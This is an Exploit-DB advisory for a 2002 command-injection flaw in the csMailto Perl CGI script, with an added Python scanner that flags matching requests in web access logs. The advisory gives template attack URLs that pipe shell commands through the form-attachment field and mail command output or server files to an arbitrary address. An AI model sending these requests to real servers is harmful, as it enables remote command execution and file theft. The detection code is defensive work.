- 18 Dec 2022
- EDB-ID: 21415
- EDB Verified: Passed
- Author: STEVE GUSTIN
- Vulnerability type: REMOTE
- Platform: CGI
- CVE: CVE-2002-0749
- Publication date: 2002-04-23
Code:
source: https://www.securityfocus.com/bid/4579/info
CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script.
Reportedly, configuration values used by the script are contained in hidden form values. As a result, a remote attacker may trivially modify these values between script invocations. Consequences include arbitrary command execution on the vulnerable system.
- execute commands on server
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
- execute command on server and mail output to anyone
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&[email protected]&form-autoresponse=YES&command=mailform
- email server file to anyone
CSMailto.cgi?form-attachment=FILEPATH_HERE&[email protected]&form-autoresponse=YES&command=mailform
- Source: www.exploit-db.com
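
A defender-side check for the request patterns listed above, as an added example that is not part of the original advisory: it scans web access-log lines for csMailto.cgi requests that carry `form-attachment` in the query string. The log lines are constructed, the reason labels are hypothetical names, and treating any query-string `form-attachment` as worth review is an assumption about how a site's forms submit their hidden fields.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCRIPT = re.compile(r"/csmailto\.cgi(?:/|$)", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, placeholders taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Apr/2002:10:00:01 +0000] "GET /cgi-bin/csMailto.cgi?command=mailform HTTP/1.0" 200 512',
    '192.0.2.44 - - [23/Apr/2002:10:02:13 +0000] "GET /cgi-bin/CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE%7C&command=mailform HTTP/1.0" 200 87',
    '192.0.2.44 - - [23/Apr/2002:10:02:40 +0000] "GET /cgi-bin/csmailto.cgi?form-attachment=FILEPATH_HERE&form-autoresponse=YES&command=mailform HTTP/1.0" 200 87',
    '192.0.2.77 - - [23/Apr/2002:10:05:00 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %257C -> %7C -> |), bounded."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(target):
    """Return the reasons a request target matches the csMailto patterns."""
    url = urlsplit(target)
    if not SCRIPT.search(unquote(url.path)):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    attachments = [fully_decode(v) for v in params.get("form-attachment", [])]
    if not attachments:
        return []
    reasons = ["attachment-in-query"]  # client-supplied configuration value
    if any("|" in v for v in attachments):
        reasons.append("pipe-in-attachment")  # command-execution pattern
    if any(v.upper() == "YES" for v in params.get("form-autoresponse", [])):
        reasons.append("attachment-with-autoresponse")  # output or file mailed out
    return reasons

def scan(lines):
    """Return (line_number, reasons) for each log line that matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = classify(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, ", ".join(reasons))
```

Values sent in a POST body do not appear in access logs, so the same checks would have to run somewhere the request body is visible.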